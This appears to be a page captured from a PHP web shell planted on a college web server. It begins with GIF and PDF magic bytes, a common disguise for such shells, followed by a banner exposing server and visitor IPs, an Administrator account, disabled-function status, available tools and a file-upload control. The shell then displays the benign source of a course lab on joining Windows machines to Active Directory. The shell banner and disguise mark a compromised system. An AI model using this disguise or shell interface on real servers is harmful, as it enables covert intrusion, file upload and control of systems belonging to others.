GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2274/Labs/Lab08.5/ |
Upload File : |
<? // JimMartinson/CST2274/Labs/Lab08.5/Lab08.5.phpinc // Lab 8.5 - Add Windows 10 VM and Core server to AD. require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced. #require('JimMartinson/DisableLab.phpinc'); $disabled = ''; $disabled = ' disabled'; require('JimMartinson/CST2274/Labs/GenerateComputerNames.phpinc'); // Includes 'Gradebook/EvaluationSubmission_BEGIN.phpinc'. $uploadFilename = $courseNumber.'_'.$evaluationName.'_'.$userFileName.'.png'; ?> <fieldset><legend>Description</legend> The purpose of this lab is to add your Windows 10 VM and Core server (<?=$coreServerName?>) to Active Directory. <br><span class="note">The DNS (Domain Name Server) role will also be installed.</span> </fieldset> <fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend> <? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this lab unless this notice has been removed.</span><br> <? } ?> <?=$gradeNote?> <ol class="count"> <li>Create a directory called <b><?=$evaluationName?></b>. We will use it for all work performed in this lab.</li> <li>Add your Windows 10 VM to your AD domain (<?=$domainName?>). <br>You will need to change the DNS setting for the adapter to use your DE server (<?=$serverName?>) for DNS. <br>Then you can add it to the domain. </li> <li>Add your Core server (<?=$coreServerName?>) to your AD domain (<?=$domainName?>): <br>Use <b class="copyText">sconfig</b> to: <ol> <li>Install all updates on your Core server (<?=$coreServerName?>) and reboot/repeat until there are no updates.</li> <li>Configure your Core server (<?=$serverName?>) to have a static IP address and change the DNS setting for the adapter to use your DE server (<?=$serverName?>) for DNS.</li> <li>Add your Core server (<?=$coreServerName?>) to your AD domain (<?=$domainName?>).</li> </ol> </li> <li>Show that you have successfully installed the Active Directory role on your DE server (<?=$serverName?>). <br>Run the <b>Active Directory Users and Computers</b>. <br>Expand your <?=$domainName?> in the left pane if needed. <br>Select the Computers OU from the left pane. <br>Take a screenshot of the <b>Active Directory Users and Computers</b> window and save it as <b class="copyText"><?=$uploadFilename?></b> in your <b><?=$evaluationName?></b> folder.<br> <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="images/aducComputers.png" alt="Active Directory Users and Computers"/><br> <? showEnd (); ?> </li> <li>Turn in your assignment: <ol type="a"> <li>Make sure the following files are in your <b><?=$evaluationName?></b> folder. <ol> <li><b><?=$uploadFilename?></b>.</li> </ol> </li> <li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b><?=$uploadFilename?></b>. </li> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"></li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.<? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this lab unless this notice has been removed.</span><? } ?></li> </ol> </li> <? /**/ ?> </ol> <?=$gradeNote?> </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>